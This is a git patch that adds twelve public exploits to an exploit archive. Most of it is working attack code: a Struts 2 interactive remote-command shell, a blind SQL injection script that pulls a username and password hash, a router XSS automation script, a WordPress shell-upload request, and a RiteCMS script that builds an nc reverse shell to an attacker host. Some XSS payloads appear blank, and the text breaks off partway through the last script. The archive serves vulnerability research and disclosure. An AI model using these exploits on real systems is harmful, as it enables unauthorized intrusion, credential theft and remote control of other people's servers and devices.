From 5aa3bfc75991dc553325ac0d60ad82554bb3ac6b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 21 Oct 2020 05:02:11 +0000 Subject: [PATCH] DB: 2020-10-21 12 changes to exploits/shellcodes Comtrend AR-5387un router - Persistent XSS (Authenticated) Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure Visitor Management System in PHP 1.0 - SQL Injection (Authenticated) Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated) WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS RiteCMS 2.2.1 - Remote Code Execution (Authenticated) Mobile Shop System v1.0 - SQL Injection Authentication Bypass Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated) --- exploits/hardware/webapps/48908.py | 274 ++++++++++++++++++++++++++++ exploits/java/webapps/48917.py | 79 ++++++++ exploits/multiple/webapps/48919.txt | 32 ++++ exploits/php/webapps/48909.txt | 22 +++ exploits/php/webapps/48910.txt | 15 ++ exploits/php/webapps/48911.txt | 41 +++++ exploits/php/webapps/48912.py | 103 +++++++++++ exploits/php/webapps/48913.txt | 67 +++++++ exploits/php/webapps/48914.txt | 27 +++ exploits/php/webapps/48915.py | 129 +++++++++++++ exploits/php/webapps/48916.txt | 45 +++++ exploits/php/webapps/48918.sh | 17 ++ files_exploits.csv | 12 ++ 13 files changed, 863 insertions(+) create mode 100755 exploits/hardware/webapps/48908.py create mode 100755 exploits/java/webapps/48917.py create mode 100644 exploits/multiple/webapps/48919.txt create mode 100644 exploits/php/webapps/48909.txt create mode 100644 exploits/php/webapps/48910.txt create mode 100644 exploits/php/webapps/48911.txt create mode 100755 exploits/php/webapps/48912.py create mode 100644 exploits/php/webapps/48913.txt create mode 100644 exploits/php/webapps/48914.txt create mode 100755 exploits/php/webapps/48915.py create mode 100644 exploits/php/webapps/48916.txt create mode 100755 exploits/php/webapps/48918.sh diff --git a/exploits/hardware/webapps/48908.py b/exploits/hardware/webapps/48908.py new file mode 100755 index 000000000..9f5e83f07 --- /dev/null +++ b/exploits/hardware/webapps/48908.py @@ -0,0 +1,274 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +""" +Exploit Title: Persistent XSS on Comtrend AR-5387un router +Date: 19/10/2020 +Exploit Author: OscarAkaElvis +Vendor Homepage: https://www.comtrend.com/ +Version: Comtrend AR-5387un router +Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i +CVE: CVE-2018-8062 + +Disclosure timeline: +08/03/2018: Vulnerability was discovered +10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062) +11/03/2018: Mitre answered, CVE number reserved +11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered +16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233) +18/10/2020: Exploit creation +19/10/2020: Exploit sent to exploit-db + +Exploitation explanation: +To exploit this vulnerability, once logged into the router, a WAN service must be created +Click on "Advanced Setup", "WAN Service". "Add button", "Next" +Then insert the payload into the "Enter Service Description" field. This was used for the PoC +Then click on "Next" four times to go on through the steps and finally click on "Apply/Save" +The result of the XSS will be displayed and triggered on the WAN services page + +This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload +Happy hacking :) +OscarAkaElvis - https://twitter.com/OscarAkaElvis +""" + +# Dependencies and libraries +import requests +from requests.auth import HTTPBasicAuth +import re +from sys import argv, exit +import argparse +from os import path +from time import sleep + + +class Exploit(object): + + # Global class vars + session = requests.Session() + user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36" + ip = None + username = None + password = None + payload = None + default_ip = "192.168.1.1" + default_username = "admin" + default_password = "admin" + default_payload = "" + exploit_version = "1.0" + current_sessionkey = None + referer_sessionkey = None + + script_name = path.basename(argv[0]) + description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router' + epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'\'' + + def start_msg(self): + print("[*] Starting CVE-2018-8062 exploit...") + sleep(0.5) + + def check_params(self, arguments): + parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text) + parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP') + parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME') + parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD') + parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD') + parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit") + + args = parser.parse_args(arguments) + + self.start_msg() + + print("[*] Launch the exploit using -h argument to check all the available options") + print() + + if not args.ip: + self.ip = self.default_ip + print("[!] Warning, no ip set, default will be used: " + str(self.ip)) + else: + self.ip = args.ip + + if not args.username: + self.username = self.default_username + print("[!] Warning, no username set, default will be used: " + str(self.username)) + else: + self.username = args.username + + if not args.password: + self.password = self.default_password + print("[!] Warning, no password set, default will be used: " + str(self.password)) + else: + self.password = args.password + + if not args.payload: + self.payload = self.default_payload + print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload)) + else: + self.password = args.password + + def print_version(self): + print() + return 'v{}'.format(self.exploit_version) + + def check_router(self): + try: + print() + print("[*] Trying to detect router...") + + headers = {"User-Agent": self.user_agent} + response = self.session.get("http://" + str(self.ip) + "/", headers=headers) + + if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)): + print("[+] Comtrend router detected successfully") + else: + print() + print("[-] It seems the target is not a Comtrend router") + print("[*] Exiting...") + exit(1) + except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError): + print() + print("[-] Can't connect to the router") + print("[*] Exiting...") + exit(1) + + def check_login(self): + print() + print("[*] Trying to login...") + + headers = {"User-Agent": self.user_agent} + response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + if response.status_code != 401: + print("[+] Login successfully!") + sleep(1) + else: + print() + print("[-] Can't login into the router. Check your creds!") + print("[*] Exiting...") + exit(1) + + def get_sessionKey(self, response_text): + sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text)) + + if sessionKey is not None: + sessionKey = sessionKey.group(1) + else: + sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE) + if sessionKey is not None: + sessionKey = sessionKey.group(1) + + return sessionKey + + def step1(self): + print() + print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...") + + headers = {"User-Agent": self.user_agent} + response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.current_sessionkey = self.get_sessionKey(response.content) + print("[+] Success! Initial sessionKey: " + self.current_sessionkey) + sleep(1) + + def step2(self): + print() + print("[*] Performing step 2/8...") + + paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"} + response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step3(self): + print() + print("[*] Performing step 3/8...") + + paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step4(self): + print() + print("[*] Performing step 4/8...") + + paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step5(self): + print() + print("[*] Performing step 5/8...") + + paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step6(self): + print() + print("[*] Performing step 6/8...") + + paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step7(self): + print() + print("[*] Performing step 7/8...") + + paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def final_step8(self): + print() + print("[*] Performing final step 8/8. Deploying XSS payload...") + + paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey} + self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + print() + print("[+] XSS payload deployed successfully") + print("[+] Happy hacking :) . Author: OscarAkaElvis") + + @staticmethod + def main(self, arguments): + self.check_params(arguments) + self.check_router() + self.check_login() + self.step1() + self.step2() + self.step3() + self.step4() + self.step5() + self.step6() + self.step7() + self.final_step8() + exit(0) + + +if __name__ == '__main__': + ImportObject = Exploit() + ImportObject.main(ImportObject, argv[1:]) \ No newline at end of file diff --git a/exploits/java/webapps/48917.py b/exploits/java/webapps/48917.py new file mode 100755 index 000000000..06d3357a0 --- /dev/null +++ b/exploits/java/webapps/48917.py @@ -0,0 +1,79 @@ +# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution +# Google Dork: ext:action | filetype:action +# Date: 2020/09/09 +# Exploit Author: Jonatas Fil +# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html +# Version: <= 2.3.15 +# Tested on: Linux +# CVE : CVE-2013-2251 + +#!/usr/bin/python +# +# coding=utf-8 +# +# Struts 2 DefaultActionMapper Exploit [S2-016] +# Interactive Shell for CVE-2013-2251 +# +# The Struts 2 DefaultActionMapper supports a method for short-circuit +navigation state changes by prefixing parameters with +# "action:" or "redirect:", followed by a desired navigational target +expression. This mechanism was intended to help with +# attaching navigational information to buttons within forms. +# +# https://struts.apache.org/docs/s2-016.html +# Jonatas Fil (@exploitation) + +import requests +import sys +import readline + + +# Disable SSL +requests.packages.urllib3.disable_warnings() + +# ShellEvil +if len(sys.argv) == 2: + target = sys.argv[1] # Payload + first = target + +"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','" + second = +"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}" + loop = 1 + while loop == 1: + cmd = raw_input("$ ") + while cmd.strip() == '': + cmd = raw_input("$ ") + if cmd.strip() == '\q': + print("Exiting...") + sys.exit() + try: + headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"} + pwn=requests.get(first+cmd+second,headers = +headers,verify=False) # Disable SSL + if pwn.status_code == 200: + print pwn.content # 1337 + else: + print("Not Vuln !") + sys.exit() + except Exception,e: + print e + print("Exiting...") + sys.exit() + +else: # BANNER + print(''' + __ _ _ _ __ _ _ +/ _\ |__ ___| | | /__\_ _(_) | +\ \| '_ \ / _ \ | |/_\ \ \ / / | | +_\ \ | | | __/ | //__ \ V /| | | +\__/_| |_|\___|_|_\__/ \_/ |_|_| + + by Jonatas Fil [@explotation] +''') + print("======================================================") + print("# Struts 2 DefaultActionMapper Exploit [S2-016] #") + print("# USO: python struts.py http://site.com:8080/xxx.action #") + print("======================================================") + print("bye") + sys.exit() \ No newline at end of file diff --git a/exploits/multiple/webapps/48919.txt b/exploits/multiple/webapps/48919.txt new file mode 100644 index 000000000..050088766 --- /dev/null +++ b/exploits/multiple/webapps/48919.txt @@ -0,0 +1,32 @@ +# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated) +# Date: 10.8.2020. +# Exploit Author: n1x_ [MS-WEB] +# Software Homepage: https://wordpress.org/plugins/wp-colorbox/ +# Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip +# Product Version: 1.1.1 + +[Description] + +# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library. + +# Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability. + +[Proof of Concept] + +# 1. Authorization as user with privileges to write and publish posts +# 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post +# 3. The code is stored on the post + + +[Example payloads] + + +# Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""] + +# Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""] + +[Response] + +... + +... \ No newline at end of file diff --git a/exploits/php/webapps/48909.txt b/exploits/php/webapps/48909.txt new file mode 100644 index 000000000..1a613fafa --- /dev/null +++ b/exploits/php/webapps/48909.txt @@ -0,0 +1,22 @@ +# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) +# Google Dork: N/A +# Date: 2020/10/19 +# Exploit Author: Akıner Kısa +# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip +# Version: 1.0 +# Tested on: XAMPP +# CVE : N/A + +Vulnerable Pages: + +http://localhost/loan/index.php?page=loans +http://localhost/loan/index.php?page=payments +http://localhost/loan/index.php?page=borrowers +http://localhost/loan/index.php?page=loan_type + +Proof of Concept: + +1 - Go to vulnerable pages and using edit button (in the right, action column). + +2 - And fill the blanks with "" payload. \ No newline at end of file diff --git a/exploits/php/webapps/48910.txt b/exploits/php/webapps/48910.txt new file mode 100644 index 000000000..ba43480b7 --- /dev/null +++ b/exploits/php/webapps/48910.txt @@ -0,0 +1,15 @@ +# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to +Courses Content Disclosure +# Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec) +# Authors blog: https://www.redtimmy.com +# Vendor Homepage: https://wpcoursesplugin.com/ +# Version Vulnerable: < 2.0.29 +# CVE: (requested but not assigned yet) + +WP Courses plugin < 2.0.29 does not protect the courses which could be +accessed by unauthenticated users using the REST API (/wp-jon/) +endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could +result in attackers accessing paying content without authorization. + +Full story here: +https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ \ No newline at end of file diff --git a/exploits/php/webapps/48911.txt b/exploits/php/webapps/48911.txt new file mode 100644 index 000000000..24ba0783b --- /dev/null +++ b/exploits/php/webapps/48911.txt @@ -0,0 +1,41 @@ +# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection +# Exploit Author: Rahul Ramkumar +# Date: 2020-09-16 +# Vendor Homepage: https://projectworlds.in +# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip +# Version: 1.0 +# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 +# CVE: CVE-2020-25760 +# Description +The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database. +Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how. + +#POC + +1) Navigate to the login page + +Example: + +http://192.168.1.72/visitor_management/index.php + +2) Enter 'username' and 'password' + +3) On the homepage, click on any visitor name and intercept the request + +4) Save the request to file. Example, visitor_management_sqli.req + +GET /visitor_management/front.php?rid=373568 HTTP/1.1 +Host: 192.168.1.72 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Referer: http://192.168.1.72/visitor_management/front.php +Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef +Upgrade-Insecure-Requests: 1 + +5) Run SQLmap on the file, + +sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10 \ No newline at end of file diff --git a/exploits/php/webapps/48912.py b/exploits/php/webapps/48912.py new file mode 100755 index 000000000..008ad84e6 --- /dev/null +++ b/exploits/php/webapps/48912.py @@ -0,0 +1,103 @@ +# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage +# Date: 2020-16-09 +# Exploit Author: nag0mez +# Vendor Homepage: https://ultimatepro.codexcube.com/ +# Version: <= 2.0.5 +# Tested on: Kali Linux 2020.2 + + +# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database. + +#!/usr/bin/env python3 +#-*- coding: utf-8 -*- +import requests +import sys + +# The original vulnerability was found on a server with an invalid SSL certificate, +# which Python could not verify. I added the verify=False parameter to avoid SSL check. +# The lack of verification results in a warning message from Python. +# To get a clean output, we will ignore all warnings. +import warnings +warnings.filterwarnings("ignore") + +host = 'https://testurl.test' # Change +url = "{}/frontend/get_article_suggestion/".format(host) + +chars = '1234567890abcdefghijklmnopqrstuvwxyz' +hex_chars = 'abcdef1234567890' + +def send_payload(payload): + try: + response = requests.post(url, data=payload, verify=False) + content = response.text + length = len(content) + return length + except Exception as e: + print('Cannot connect to host. Exit.') + sys.exit(1) + + +def get_first_user(): + found = True + known = '' + + while found: + + found = False + for c in chars: + test = known + c + payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)} + length = send_payload(payload) + + if length > 2: + found = True + known += c + print(c, end='') + sys.stdout.flush() + break + + return known + +def get_hash(username): + found = True + known = '' + + while found: + + found = False + for c in hex_chars: + test = known + c + payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)} + length = send_payload(payload) + + if length > 2: + found = True + known += c + print(c, end='') + sys.stdout.flush() + break + + return known + + +if __name__ == '__main__': + print('Exploit started.') + print('Guessing username...') + + username = get_first_user() + + if username != '': + print('\nUsername found: {}'.format(username)) + else: + print('\nCould not get username! Exit.') + sys.exit(1) + + print('Guessing password SHA512 hash...') + + sha = get_hash(username) + + if sha != '': + print('\nHash found: {}'.format(sha)) + else: + print('\nCould not get Hash! Exit.') + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/48913.txt b/exploits/php/webapps/48913.txt new file mode 100644 index 000000000..b157ee8a3 --- /dev/null +++ b/exploits/php/webapps/48913.txt @@ -0,0 +1,67 @@ +# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload +# Date: 2020-10-20 +# Exploit Author: Net-Hunter +# Google Dork: N/A +# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/ +# Vendor Homepage: https://www.heliossolutions.co/ +# Tested on: Linux Apache / Wordpress 5.5.1 +# Version: 2.1 + + +.:: Description ::. +An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File +Because the extension of the Uploaded Flie is Checked on Client Side + +.:: Vulnerable File ::. +/wp-admin/admin.php?page=hs-brand-logo-slider.php + +.:: Vulnerable Code ::. +Content-Disposition: form-data; name="logoupload"; filename="a.php" +Content-Type: image/jpeg + + +.:: Proof Of Concept (Poc) ::. +Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu +Upload +Step 2 - Stop the upload request with burp suite +Step 3 - Rename the file, for example a.jpg to a.php +Step 4 - Your shell has been uploaded, showing the file path in the table + +.:: Sample Request::. + +POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1 +Host: 172.16.1.17:81 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php +Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227 +Content-Length: 81765 +Origin: http://172.16.1.17:81 +Connection: close +Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907 +Upgrade-Insecure-Requests: 1 + +-----------------------------407602771734524910834293111227 +Content-Disposition: form-data; name="brandname" + +aaa +-----------------------------407602771734524910834293111227 +Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php" +Content-Type: image/jpeg + + +-----------------------------407602771734524910834293111227 +Content-Disposition: form-data; name="logourl" + +http://aa.com +-----------------------------407602771734524910834293111227 +Content-Disposition: form-data; name="sortorder" + +1 +-----------------------------407602771734524910834293111227 +Content-Disposition: form-data; name="submit_data" + +Submit +-----------------------------407602771734524910834293111227-- \ No newline at end of file diff --git a/exploits/php/webapps/48914.txt b/exploits/php/webapps/48914.txt new file mode 100644 index 000000000..a7e0b124b --- /dev/null +++ b/exploits/php/webapps/48914.txt @@ -0,0 +1,27 @@ +# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS +# Google Dork: N/A +# Date: 2020-08-07 +# Exploit Author: yusufmalikul +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: 2.1 +# Tested on: Windows 10 +# CVE : N/A + +Description + +User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to +Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user +list on manage user page triggering the payload. + +POC + +User side +1. Go to the user registration page http://localhost/loginsystem +2. Enter in one of the field (first name, last name, email, or contact) +3. Click sign up + +Admin side +1. Login to admin panel http://localhost/loginsystem/admin +2. After login successful it will redirect to manage user page +3. Payload triggered \ No newline at end of file diff --git a/exploits/php/webapps/48915.py b/exploits/php/webapps/48915.py new file mode 100755 index 000000000..ed1c5db09 --- /dev/null +++ b/exploits/php/webapps/48915.py @@ -0,0 +1,129 @@ +# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution +# Date: 2020-07-03 +# Exploit Author: H0j3n +# Vendor Homepage: http://ritecms.com/ +# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download +# Version: 2.2.1 +# Tested on: Linux +# Reference: https://www.exploit-db.com/exploits/48636 + +# !/usr/bin/python +# coding=utf-8 +import requests,sys,base64,os +from colorama import Fore, Back, Style +from requests_toolbelt.multipart.encoder import MultipartEncoder +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Variable +CONTENT = '''
''' + +# Header +def header(): + top = cyan(''' + \t _____ _ _ _____ __ __ _____ + \t| __ \(_) | / ____| \/ |/ ____| + \t| |__) |_| |_ ___| | | \ / | (___ ___ ___ ___ + \t| _ /| | __/ _ \ | | |\/| |\___ \ _ __ |_ | |_ | < / + \t| | \ \| | || __/ |____| | | |____) | | |/ / / __/_ / __/_ / / + \t|_| \_\_|\__\___|\_____|_| |_|_____/ |___/ /____(_)____(_)_/ +''') + return top + +def info(): + top = cyan(''' +[+] IP : {0} +[+] USERNAME : {1} +[+] PASSWORD : {2} +'''.format(IP,USER,PASS)) + + return top + +# Request Function +# Color Function +def cyan(STRING): + return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET + +def red(STRING): + return Style.BRIGHT+Fore.RED+STRING+Fore.RESET + + +# Main +if __name__ == "__main__": + print header() + print "\t--------------------------------------------------------------" + print "\t| RiteCMS v2.2.1 - Authenticated Remote Code Execution |" + print "\t--------------------------------------------------------------" + print "\t| Reference : https://www.exploit-db.com/exploits/48636 |" + print "\t| By : H0j3n |" + print "\t--------------------------------------------------------------" + if len(sys.argv) == 1: + print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) + + print cyan("\n[-] Please Put IP & Credentials") + sys.exit(-1) + if len(sys.argv) == 2: + print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) + + print cyan("\n[-] Please Put Credentials") + sys.exit(-1) + if len(sys.argv) > 3: + print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) + + print cyan("\n[-] Only 2 arguments needed please see the usage!") + sys.exit(-1) + IP = sys.argv[1] + USER,PASS = sys.argv[2].split(":") + print info() + + URL='{0}/cms/index.php'.format(IP) + URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media' + + HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"} + LOG_INFO = {"username" : USER, "userpw" : PASS} + try: + with requests.Session() as SESSION: + SESSION.get(URL) + SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False) + except: + print red("[-] Check the URL!") + sys.exit(-1) + if CONTENT in str(SESSION.get(URL_UPLOAD).text): + print red("[-] Cannot Login!") + sys.exit(-1) + else: + print cyan("[+] Credentials Working!") + LHOST = str(raw_input("Enter LHOST : ")) + LPORT = str(raw_input("Enter LPORT : ")) + FILENAME = str(raw_input("Enter FileName (include.php) : ")) + PAYLOAD = "&1|nc {0} {1} 